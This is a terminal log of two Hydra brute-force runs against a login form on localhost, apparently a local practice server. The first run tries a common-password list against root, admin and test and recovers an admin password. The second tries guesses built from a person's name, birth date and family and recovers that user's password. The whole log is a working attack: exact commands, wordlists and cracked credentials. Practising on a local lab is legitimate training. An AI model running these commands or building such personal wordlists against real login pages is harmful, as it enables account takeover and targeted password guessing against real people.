➜  brute-force-server git:(main) ✗ ls
main.py  passwords.txt  usernames.txt
➜  brute-force-server git:(main) ✗ hydra -f -I -V -L usernames.txt -P passwords.txt -s 8000 localhost http-form-post "/login:username=^USER^&password=^PASS^:F=Invalid"
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-02 10:26:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1717 login tries (l:17/p:101), ~108 tries per task
[DATA] attacking http-post-form://localhost:8000/login:username=^USER^&password=^PASS^:F=Invalid
[ATTEMPT] target localhost - login "root" - pass "123456" - 1 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456789" - 2 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "111111" - 3 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "password" - 4 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty" - 5 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "admin" - 6 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "abc123" - 7 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345678" - 8 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "password1" - 9 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234567" - 10 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123123" - 11 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234567890" - 12 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "000000" - 13 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345" - 14 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "iloveyou" - 15 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r5t" - 16 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234" - 17 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456a" - 18 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwertyuiop" - 19 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "monkey" - 20 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123321" - 21 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "dragon" - 22 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "654321" - 23 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "666666" - 24 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123" - 25 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "myspace1" - 26 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "a123456" - 27 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "121212" - 28 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1qaz2wsx" - 29 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123qwe" - 30 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123abc" - 31 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "tinkle" - 32 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "target123" - 33 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "gwerty" - 34 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1g2w3e4r" - 35 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "gwerty123" - 36 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "zag12wsx" - 37 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "7777777" - 38 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty1" - 39 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e4r" - 40 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "987654321" - 41 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "222222" - 42 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwe123" - 43 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qwerty123" - 44 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "zxcvbnm" - 45 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "555555" - 46 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "112233" - 47 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "fuckyou" - 48 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdfghjkl" - 49 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345a" - 50 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123123123" - 51 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1q2w3e" - 52 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "qazwsx" - 53 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "computer" - 54 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "aaaaaa" - 55 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "159753" - 56 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "iloveyou1" - 57 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "fuckyou1" - 58 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "princess" - 59 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "789456123" - 60 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "11111111" - 61 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123654" - 62 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "princess1" - 63 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "888888" - 64 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "linkedin" - 65 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "michael" - 66 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "sunshine" - 67 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "football" - 68 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "11111" - 69 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "777777" - 70 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "1234qwer" - 71 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "999999" - 72 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "j38ifUbn" - 73 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "monkey1" - 74 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "football1" - 75 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "daniel" - 76 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "azerty" - 77 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "a12345" - 78 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "123456789a" - 79 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "789456" - 80 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdfgh" - 81 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "love123" - 82 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "abcd1234" - 83 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "jordan23" - 84 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "88888888" - 85 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12345admin" - 86 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "root" - pass "5201314" - 87 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "root" - pass "12qwaszx" - 88 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "root" - pass "FQRG7CS493" - 89 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "root" - pass "ashley" - 90 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asdf" - 91 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "root" - pass "asd123" - 92 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "root" - pass "superman" - 93 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "root" - pass "jessica" - 94 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "root" - pass "love" - 95 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "root" - pass "samsung" - 96 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "root" - pass "shadow" - 97 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "root" - pass "blink182" - 98 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "root" - pass "333333" - 99 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "root" - pass "michael1" - 100 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "root" - pass "babygirl1" - 101 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456" - 102 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456789" - 103 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "111111" - 104 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password" - 105 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty" - 106 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "admin" - 107 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "abc123" - 108 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345678" - 109 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "password1" - 110 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234567" - 111 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123123" - 112 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234567890" - 113 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "000000" - 114 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345" - 115 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveyou" - 116 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r5t" - 117 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234" - 118 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456a" - 119 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwertyuiop" - 120 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "monkey" - 121 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123321" - 122 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "dragon" - 123 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "654321" - 124 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "666666" - 125 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123" - 126 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "myspace1" - 127 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "a123456" - 128 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "121212" - 129 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1qaz2wsx" - 130 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123qwe" - 131 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123abc" - 132 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "tinkle" - 133 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "target123" - 134 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "gwerty" - 135 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1g2w3e4r" - 136 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "gwerty123" - 137 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "zag12wsx" - 138 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "7777777" - 139 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty1" - 140 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e4r" - 141 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "987654321" - 142 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "222222" - 143 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwe123" - 144 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qwerty123" - 145 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "zxcvbnm" - 146 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "555555" - 147 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "112233" - 148 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "fuckyou" - 149 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdfghjkl" - 150 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345a" - 151 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123123123" - 152 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1q2w3e" - 153 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "qazwsx" - 154 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "computer" - 155 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "aaaaaa" - 156 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "159753" - 157 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "iloveyou1" - 158 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "fuckyou1" - 159 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "princess" - 160 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "789456123" - 161 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "11111111" - 162 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123654" - 163 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "princess1" - 164 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "888888" - 165 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "linkedin" - 166 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "michael" - 167 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "sunshine" - 168 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "football" - 169 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "11111" - 170 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "777777" - 171 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234qwer" - 172 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "999999" - 173 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "j38ifUbn" - 174 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "monkey1" - 175 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "football1" - 176 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "daniel" - 177 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "azerty" - 178 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "a12345" - 179 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456789a" - 180 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "789456" - 181 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdfgh" - 182 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "love123" - 183 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "abcd1234" - 184 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "jordan23" - 185 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "88888888" - 186 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345admin" - 187 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "5201314" - 188 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12qwaszx" - 189 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "FQRG7CS493" - 190 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "ashley" - 191 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdf" - 192 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asd123" - 193 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "superman" - 194 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "jessica" - 195 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "love" - 196 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "samsung" - 197 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "shadow" - 198 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "blink182" - 199 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "333333" - 200 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "michael1" - 201 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "babygirl1" - 202 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "test" - pass "123456" - 203 of 1717 [child 11] (0/0)
[8000][http-post-form] host: localhost   misc: /login:username=^USER^&password=^PASS^:F=Invalid   login: admin   password: 12345admin
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-02 10:26:06

 task git:(main) ✗ hydra -f -I -V -L username.txt -P passwords-if-bio-known.txt -s 8000 localhost http-form-post "/login:username=^USER^&password=^PASS^:F=Invalid" 
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-03 09:40:12
[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:1/p:40), ~3 tries per task
[DATA] attacking http-post-form://localhost:8000/login:username=^USER^&password=^PASS^:F=Invalid
[ATTEMPT] target localhost - login "johnsmith" - pass "john" - 1 of 40 [child 0] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "smith" - 2 of 40 [child 1] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnsmith" - 3 of 40 [child 2] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jsmith" - 4 of 40 [child 3] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john.smith" - 5 of 40 [child 4] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john1990" - 6 of 40 [child 5] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "smith1990" - 7 of 40 [child 6] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnsmith1990" - 8 of 40 [child 7] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john01051990" - 9 of 40 [child 8] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john0105" - 10 of 40 [child 9] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jsmith90" - 11 of 40 [child 10] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "John1990!" - 12 of 40 [child 11] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john@1990" - 13 of 40 [child 12] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jOhN" - 14 of 40 [child 13] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "sMiTh" - 15 of 40 [child 14] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jOhNsMiTh" - 16 of 40 [child 15] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jOhN1990" - 17 of 40 [child 1] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "may1990" - 18 of 40 [child 0] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "jan1990" - 19 of 40 [child 2] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnmay90" - 20 of 40 [child 3] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john_password" - 21 of 40 [child 9] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john_pass" - 22 of 40 [child 10] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john_admin" - 23 of 40 [child 11] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "letmein_john" - 24 of 40 [child 12] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "welcome_john" - 25 of 40 [child 13] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johndad" - 26 of 40 [child 15] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnmom" - 27 of 40 [child 4] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnwife" - 28 of 40 [child 5] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnsohn" - 29 of 40 [child 6] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john123main" - 30 of 40 [child 7] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnlondon" - 31 of 40 [child 8] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "johnnyc" - 32 of 40 [child 14] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john@smith" - 33 of 40 [child 1] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john_smith" - 34 of 40 [child 0] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john-smith" - 35 of 40 [child 2] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "john.smith.1990" - 36 of 40 [child 3] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "password123john" - 37 of 40 [child 9] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "admin123john" - 38 of 40 [child 10] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "welcome123john" - 39 of 40 [child 12] (0/0)
[ATTEMPT] target localhost - login "johnsmith" - pass "qwerty123john" - 40 of 40 [child 13] (0/0)
[8000][http-post-form] host: localhost   misc: /login:username=^USER^&password=^PASS^:F=Invalid   login: johnsmith   password: john.smith.1990
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-03 09:40:13
➜  task git:(main) ✗ 
